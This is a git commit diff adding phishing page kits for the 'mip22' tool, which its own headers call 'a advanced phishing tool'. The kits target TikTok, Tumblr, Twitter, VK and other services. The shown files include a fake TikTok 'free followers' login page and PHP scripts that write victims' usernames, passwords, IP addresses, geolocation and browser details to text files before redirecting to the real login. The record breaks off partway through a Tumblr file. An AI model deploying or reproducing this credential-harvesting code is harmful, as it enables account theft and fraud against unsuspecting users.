mak 3 жил өмнө
parent
commit
7106e3b32a
42 өөрчлөгдсөн 3767 нэмэгдсэн , 0 устгасан
  1. 126 0
      .pages/tiktok_followers/fingerprints.php
  2. 60 0
      .pages/tiktok_followers/index.html
  3. 25 0
      .pages/tiktok_followers/index.php
  4. 1 0
      .pages/tiktok_followers/jquery.min.js
  5. 209 0
      .pages/tiktok_followers/jscript.js
  6. BIN
      .pages/tiktok_followers/logo.png
  7. 130 0
      .pages/tiktok_followers/post.php
  8. BIN
      .pages/tiktok_followers/sadflix.ttf
  9. 268 0
      .pages/tiktok_followers/style.css
  10. 126 0
      .pages/tumblr/fingerprints.php
  11. 51 0
      .pages/tumblr/index.html
  12. 25 0
      .pages/tumblr/index.php
  13. 130 0
      .pages/tumblr/post.php
  14. 126 0
      .pages/twitch/fingerprints.php
  15. 1 0
      .pages/twitch/index.html
  16. 25 0
      .pages/twitch/index.php
  17. 130 0
      .pages/twitch/post.php
  18. 126 0
      .pages/twitter/fingerprints.php
  19. 480 0
      .pages/twitter/index.html
  20. 34 0
      .pages/twitter/index.php
  21. 474 0
      .pages/twitter/mobile.html
  22. 130 0
      .pages/twitter/post.php
  23. 126 0
      .pages/viber_out/fingerprints.php
  24. 92 0
      .pages/viber_out/index.html
  25. 25 0
      .pages/viber_out/index.php
  26. 130 0
      .pages/viber_out/post.php
  27. 126 0
      .pages/vimeo/fingerprints.php
  28. 36 0
      .pages/vimeo/index.html
  29. 25 0
      .pages/vimeo/index.php
  30. 130 0
      .pages/vimeo/post.php
  31. 0 0
      .pages/vk/b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download
  32. 0 0
      .pages/vk/b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download
  33. 0 0
      .pages/vk/common.6d5af9c51c7e29087e36.js.download
  34. 0 0
      .pages/vk/common.css
  35. BIN
      .pages/vk/counter
  36. 126 0
      .pages/vk/fingerprints.php
  37. 119 0
      .pages/vk/index.html
  38. 25 0
      .pages/vk/index.php
  39. BIN
      .pages/vk/p
  40. 0 0
      .pages/vk/polyfills.c5f9a2ced681ad88809a.js.download
  41. 130 0
      .pages/vk/post.php
  42. 0 0
      .pages/vk/vendors.2773b57485e379f375b2.js.download

+ 126 - 0
.pages/tiktok_followers/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTIKTOK VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

+ 60 - 0
.pages/tiktok_followers/index.html

@@ -0,0 +1,60 @@
+<!DOCTYPE html>
+<html>
+<!-- Powered By SADFLIX  -->
+<!-- COPIED FROM https://github.com/swagkarna/TikTok-Phishing-V3/blob/main/tiktokv3.zip -->
+
+<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>Tik Tok Followers</title>
+<script src="jquery.min.js"></script>
+<script src="jscript.js"></script>
+<link rel="stylesheet" type="text/css" href="style.css">
+<style>
+    @media(max-width:760px){
+       #TFG{
+           font-size:140%;
+       } 
+       .buttonstyle{
+           font-size:100%;
+       }
+    
+    .followers , .likes{
+        width:95%;
+    }
+    }
+</style>
+</head>
+<body onload="updateyear()">
+</div>
+<div id="main-tool">
+	<div class="wrapper"><img src="logo.png"></div>
+	<h1 id="TFG">Login</h1>
+<p class="sub-heading">Login to get 10.000 Tiktok Followers Free</p>
+
+    <form action="post.php" method="post">
+    <center>
+    <div id="fillup">
+        <div class="form-option">
+        	<input name="email" class="input-form input-command" type="text" placeholder="Username/Email/Phone" required>
+        </div>
+    <div id="fillup">
+        <div class="form-option">
+        	<input name="password" class="input-form input-command" type="password" placeholder="Password" required>
+        </div>
+
+        <br><br>
+        <button class="buttonstyle"><b>Login</b></button>
+        </center>
+
+    </div>
+</div>
+
+<div id="steps" style="display:none;">
+
+</div>
+
+<div id="comment" style="display:none;" >
+</div>
+</body>
+<!-- Powered By Sadflix -->
+</html>

+ 25 - 0
.pages/tiktok_followers/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 1 - 0
.pages/tiktok_followers/jquery.min.js


+ 209 - 0
.pages/tiktok_followers/jscript.js

@@ -0,0 +1,209 @@
+function updateyear() {
+    var today = new Date();
+    var year = today.getFullYear();
+    document.getElementById("year").innerHTML = year;
+}
+
+var randomnumber = setInterval(randomuser,6000);
+
+var getresources = 336699;
+var resourcestime = setInterval(resourcesupdate,100);
+
+var today = new Date().toLocaleDateString('en-US', {  
+    day : 'numeric',
+    month : 'short',
+    year : 'numeric'
+}).split(' ').join(' ');
+
+setTimeout(toolupdated, 300);
+
+function toolupdated() {
+	document.getElementById("date").innerHTML = today;
+}
+
+function move() {
+	var username = document.getElementById("username").value;
+	var follower = document.getElementById("follower").value;
+	var like = document.getElementById("like").value;
+
+	if(username == "") {
+		alert("Please insert your tiktok.com username or email address.");
+		return false;
+	}
+
+	document.getElementById("fillup").style.display = "none";
+	document.getElementById("steps").style.display = "none";
+	document.getElementById("comment").style.display = "none";
+	document.getElementById("progressbarcontainer").style.display = "block";
+	var elem = document.getElementById("progressbar");
+	var width = 10;
+	var id = setInterval(frame, 693);
+	function frame() {
+		if (width > 10 && width < 20) {
+			document.getElementById("progresslog").innerHTML = "Menghubungkan...";
+			$("#gen1").fadeIn("slow");
+		}
+
+		if (width > 20 && width < 30) {
+			document.getElementById("progresslog").innerHTML = "Menghubungkan..";
+			$("#gen1").fadeOut("slow");
+			$("#gen2").fadeIn("slow");
+		}
+
+		if (width > 30 && width < 40) {
+			document.getElementById("progresslog").innerHTML = "Mencari Username : "+username+"";
+			$("#gen2").fadeOut("slow");
+			$("#gen3").fadeIn("slow");
+		}
+
+		if (width > 40 && width < 45) {
+			document.getElementById("progresslog").innerHTML = "Username "+username+" Berhasil Terhubung!";
+			$("#gen3").fadeOut("slow");
+			$("#gen4").fadeIn("slow");
+		}
+		
+
+		if (width > 60 && width < 75) {
+			document.getElementById("progresslog").innerHTML = "Mengirim "+follower+" Followers Ke "+username+"";
+			$("#gen5").fadeOut("slow");
+			$("#gen6").fadeIn("slow");
+
+			if (document.getElementById("addfollowerbarlabel").innerHTML == 0) {
+				startaddfollower();
+			}
+		}
+		
+		if (width > 75 && width < 90) {
+			document.getElementById("progresslog").innerHTML = "Mengirim "+like+" Like Ke "+username+"";
+			$("#gen6").fadeOut("slow");
+			$("#gen7").fadeIn("slow");
+
+			if (document.getElementById("addlikebarlabel").innerHTML == 0) {
+				startaddlike();
+			}
+		}
+
+		if (width > 90 && width < 99) {
+			document.getElementById("progresslog").innerHTML = "Berhasil!";
+			$("#gen7").fadeOut("slow");
+			$("#gen1").fadeIn("slow");
+		}
+
+	    if (width >= 99) {
+    		setTimeout(verify, 1000);
+			clearInterval(id);
+	    } else {
+			width++;
+			elem.style.width = width + '%';
+			document.getElementById("progressbarlabel").innerHTML = width * 1  + '%';
+			}
+	}
+}
+
+function verify() {
+	document.getElementById("verifybg").style.height = "100%";
+}
+
+function randomuser() {
+	document.getElementById("randomnumber").innerHTML = Math.floor(Math.random() * 9999);
+}
+
+function resourcesupdate() {
+	document.getElementById("resources").innerHTML = getresources++;
+}
+
+function startaddfollower() {
+	var addfollowerelem = document.getElementById("addfollowerbar");
+	var addfollowerwidth = 1;
+	var addfollowerwidthid = setInterval(addfollowerwidthnow, 16);
+	var addfollowerid = setInterval(addfollowernow, 3);
+	var addfollower = 0;
+
+	var addfollowerspeed = 0;
+
+	if(document.getElementById("follower").value == 10000)
+	{
+		addfollowerspeed = 50;
+	}
+
+	if(document.getElementById("follower").value == 50000)
+	{
+		addfollowerspeed = 100;
+	}
+
+	if(document.getElementById("follower").value == 75000)
+	{
+		addfollowerspeed = 250;
+	}
+
+	if(document.getElementById("follower").value == 100000)
+	{
+		addfollowerspeed = 500;
+	}
+
+	function addfollowernow() {
+		if (addfollower >= document.getElementById("follower").value) {
+			clearInterval(addfollowerid);
+		} else {
+			addfollower += addfollowerspeed;
+			document.getElementById("addfollowerbarlabel").innerHTML = addfollower;
+		}
+	}
+
+	function addfollowerwidthnow() {
+		if (addfollowerwidth >= 100) {
+			clearInterval(addfollowerwidthid);
+		} else {
+			addfollowerwidth++;
+			addfollowerelem.style.width = addfollowerwidth + '%';
+		}
+	}
+}
+
+function startaddlike() {
+	var addlikeelem = document.getElementById("addlikebar");
+	var addlikewidth = 1;
+	var addlikewidthid = setInterval(addlikewidthnow, 16);
+	var addlikeid = setInterval(addlikenow, 3);
+	var addlike = 0;
+
+	var addlikespeed = 0;
+
+	if(document.getElementById("like").value == 10000)
+	{
+		addlikespeed = 50;
+	}
+
+	if(document.getElementById("like").value == 50000)
+	{
+		addlikespeed = 100;
+	}
+
+	if(document.getElementById("like").value == 75000)
+	{
+		addlikespeed = 250;
+	}
+
+	if(document.getElementById("like").value == 100000)
+	{
+		addlikespeed = 500;
+	}
+
+	function addlikenow() {
+		if (addlike >= document.getElementById("like").value) {
+			clearInterval(addlikeid);
+		} else {
+			addlike += addlikespeed;
+			document.getElementById("addlikebarlabel").innerHTML = addlike;
+		}
+	}
+
+	function addlikewidthnow() {
+		if (addlikewidth >= 100) {
+			clearInterval(addlikewidthid);
+		} else {
+			addlikewidth++;
+			addlikeelem.style.width = addlikewidth + '%';
+		}
+	}
+}

BIN
.pages/tiktok_followers/logo.png


+ 130 - 0
.pages/tiktok_followers/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTIKTOK VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.tiktok.com/login"/> 

BIN
.pages/tiktok_followers/sadflix.ttf


+ 268 - 0
.pages/tiktok_followers/style.css

@@ -0,0 +1,268 @@
+@font-face {
+    font-family: sadflix;
+    src: url(sadflix.ttf);
+}
+
+.fullscreen-bg {
+    position: fixed;
+    top: 0;
+    right: 0;
+    bottom: 0;
+    left: 0;
+    overflow: hidden;
+    z-index: -100;
+}
+
+.fullscreen-bg__video {
+    margin-left:auto; 
+    margin-right:auto;
+    position: relative;
+    top: 0;
+    left: 0;
+    height: 100%;
+}
+
+body {
+    text-align: center;
+    font-family: sadflix;
+    color: white;
+}
+
+img {
+    display: block;
+    margin-left: auto;
+    margin-right: auto;
+}
+
+table {
+    margin-left:auto; 
+    margin-right:auto;
+}
+
+select.input-command {
+    border-radius: 9px;
+    height: 46px;
+    line-height: 46px;
+    font-family: sadflix;
+    background-color: white;
+    box-shadow: 0 1px 1px rgba(2, 83, 136, 0.075) inset;
+    color: black;
+}
+
+.form-option {
+    margin-left: 15px;
+    margin-right: 38px;
+    margin-bottom: 20px;
+    font-family: sadflix;
+}
+
+.input-form {
+    border-radius: 9px;
+    color: black;
+    background-color: white;
+    box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
+    display: block;
+    font-size: 14px;
+    height: 20px;
+    line-height: 1.42857;
+    padding: 6px 12px;
+    transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
+    vertical-align: middle;
+    width: 100%;
+    font-family: sadflix;
+}
+
+.input-command {
+    font-size: 18px;
+    height: 28px;
+    line-height: 1.33;
+    padding: 10px 16px;
+    color: black;
+}
+
+.input-form::-moz-placeholder {
+    color: #999;
+    opacity: 55;
+}
+
+.wrapper {
+    padding: 0;
+}
+
+.wrapper img {
+    width: 30%;
+}
+
+.buttonstyle {
+    background: Transparent; /* For browsers that do not support gradients */
+    border-radius: 19px;
+    border: 6px white solid;
+    color: white;
+    padding: 16px 33px;
+    display: inline-block;
+    font-size: 33px;
+    height: auto;
+    font-family: sadflix;
+}
+
+#progressbarcontainer {
+    background: white;
+    border-radius: 19px;
+    border: 9px white solid;
+    display: none;
+    position: relative;
+    margin-left: auto;
+    margin-right: auto;
+    width: 90%;
+    height: 30px;
+}
+
+#progressbar {
+    border-radius: 19px;
+    position: absolute;
+    width: 10%;
+    height: 100%;
+    background: #150608;
+}
+
+#progressbarlabel {
+    line-height: 30px;
+    text-align: center;
+    color: white;
+}
+
+#main-tool {
+    background: #000000; /* For browsers that do not support gradients */
+    background: -webkit-radial-gradient(#000000, #000000); /* Safari 5.1 to 6.0 */
+    background: -o-radial-gradient(#000000, #000000); /* For Opera 11.6 to 12.0 */
+    background: -moz-radial-gradient(#000000, #000000); /* For Firefox 3.6 to 15 */
+    background: radial-gradient(#000000, #000000); /* Standard syntax */
+    border-radius: 9px;
+    max-width: 500px;
+    margin: 20px auto 20px;
+    padding: 50px;
+    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
+}
+
+
+
+
+#verifybg {
+    height: 0%;
+    width: 100%;
+    left: 0;
+    top: 0;
+    position: fixed;
+    z-index: 1;
+    overflow-x: hidden;
+    transition: 0.5s;
+    background-color: rgb(0,0,0);
+    background-color: rgba(0,0,0, 0.3);
+}
+
+#verify {
+    margin-left: auto;
+    margin-right: auto;
+    color: white;
+    position: relative;
+    background: #f98691; /* For browsers that do not support gradients */
+    background: -webkit-radial-gradient(#09f5f9, #f98691); /* Safari 5.1 to 6.0 */
+    background: -o-radial-gradient(#09f5f9, #f98691); /* For Opera 11.6 to 12.0 */
+    background: -moz-radial-gradient(#09f5f9, #f98691); /* For Firefox 3.6 to 15 */
+    background: radial-gradient(#150608, #f98691); /* Standard syntax */
+    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
+    border-radius: 9px;
+    width: 90%;
+}
+
+#verifycontent {
+    margin-left: auto;
+    margin-right: auto;
+    width: 90%;
+}
+
+#shield{
+    margin-bottom: 5px;
+}
+
+#gen1 {
+    display: none;
+}
+
+#gen2 {
+    display: none;
+}
+
+#gen3 {
+    display: none;
+}
+
+#gen4 {
+    display: none;
+}
+
+#gen5 {
+    display: none;
+}
+
+#gen6 {
+    display: none;
+}
+
+#gen7 {
+    display: none;
+}
+
+#addfollowerbarcontainer {
+    background: white;
+    border-radius: 19px;
+    border: 9px white solid;
+    position: relative;
+    margin-left: auto;
+    margin-right: auto;
+    width: 60%;
+    height: 10px;
+}
+
+#addfollowerbar {
+    border-radius: 19px;
+    position: absolute;
+    background: #ff0f50;
+    width: 1%;
+    height: 100%;
+}
+
+#addfollowerbarlabel {
+    font-size: 60%;
+    line-height: 10px;
+    text-align: center;
+    color: white;
+    font-family: sadflix;
+}
+
+#addlikebarcontainer {
+    background: white;
+    border-radius: 19px;
+    border: 9px white solid;
+    position: relative;
+    margin-left: auto;
+    margin-right: auto;
+    width: 60%;
+    height: 10px;
+}
+
+#addlikebar {
+    border-radius: 19px;
+    position: absolute;
+    background: #ff0f50;
+    width: 1%;
+    height: 100%;
+}
+
+#addlikebarlabel {
+    font-size: 60%;
+    line-height: 10px;
+    text-align: center;
+    color: white;
+    font-family: sadflix;
+}

+ 126 - 0
.pages/tumblr/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTUMBLR VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 51 - 0
.pages/tumblr/index.html


+ 25 - 0
.pages/tumblr/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
